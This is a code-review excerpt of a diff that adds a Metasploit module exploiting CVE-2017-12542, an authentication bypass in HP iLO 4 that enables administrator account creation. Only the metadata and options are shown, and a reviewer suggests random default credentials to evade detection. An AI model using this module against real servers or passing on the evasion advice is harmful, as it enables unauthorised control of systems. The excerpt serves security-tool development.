modules/auxiliary/admin/hp/hp_ilo_create_admin_account.rb

```diff
@@ -0,0 +1,108 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'HP iLO 4 1.00-2.50 Authentication Bypass Administrator Account Creation',
+      'Description'    => %q{
+        This module exploits an authentication bypass in HP iLO 4 1.00 to 2.50, triggered by a buffer
+        overflow in the Connection HTTP header handling by the web server.
+        Exploiting this vulnerability gives full access to the Rest API, allowing arbitrary
+        accounts creation.
+      },
+      'References'     =>
+        [
+          [ 'CVE', '2017-12542' ],
+          [ 'BID', '100467' ],
+          [ 'URL', 'https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us' ],
+          [ 'URL', 'https://www.synacktiv.com/posts/exploit/hp-ilo-talk-at-recon-brx-2018.html' ]
+        ],
+      'Author'         =>
+        [
+          'Fabien Perigaud <fabien[dot]perigaud[at]synacktiv[dot]com>'
+        ],
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => "Aug 24 2017",
+      'DefaultOptions' => { 'SSL' => true }
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('USERNAME', [true, 'Username for the new account', 'msf_user']),
```

Comment:
IMO it might be better to set both this and the password to a random string by default in `setup`.  This will help evade detection.